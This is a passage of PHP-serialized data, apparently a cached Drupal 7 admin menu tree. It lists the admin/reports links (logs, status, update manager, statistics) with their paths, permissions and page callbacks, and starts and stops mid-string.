types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:298;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"298\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:4:{i:304;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"304\";s:4:\"plid\";s:3:\"298\";s:9:\"link_path\";s:29:\"admin/reports/updates/install\";s:11:\"router_path\";s:29:\"admin/reports/updates/install\";s:10:\"link_title\";s:27:\"Install new module or theme\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"25\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:3:\"304\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:62:\"a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:27:\"Install new module or theme\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:305;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"305\";s:4:\"plid\";s:3:\"298\";s:9:\"link_path\";s:28:\"admin/reports/updates/update\";s:11:\"router_path\";s:28:\"admin/reports/updates/update\";s:10:\"link_title\";s:6:\"Update\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:3:\"305\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:6:\"Update\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:306;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"306\";s:4:\"plid\";s:3:\"298\";s:9:\"link_path\";s:26:\"admin/reports/updates/list\";s:11:\"router_path\";s:26:\"admin/reports/updates/list\";s:10:\"link_title\";s:4:\"List\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:3:\"306\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:307;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"307\";s:4:\"plid\";s:3:\"298\";s:9:\"link_path\";s:30:\"admin/reports/updates/settings\";s:11:\"router_path\";s:30:\"admin/reports/updates/settings\";s:10:\"link_title\";s:8:\"Settings\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"50\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:3:\"307\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:33:\"a:1:{i:0;s:15:\"update_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:402;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"402\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"402\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:403;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"403\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"403\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:404;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"404\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"404\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:405;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"405\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many 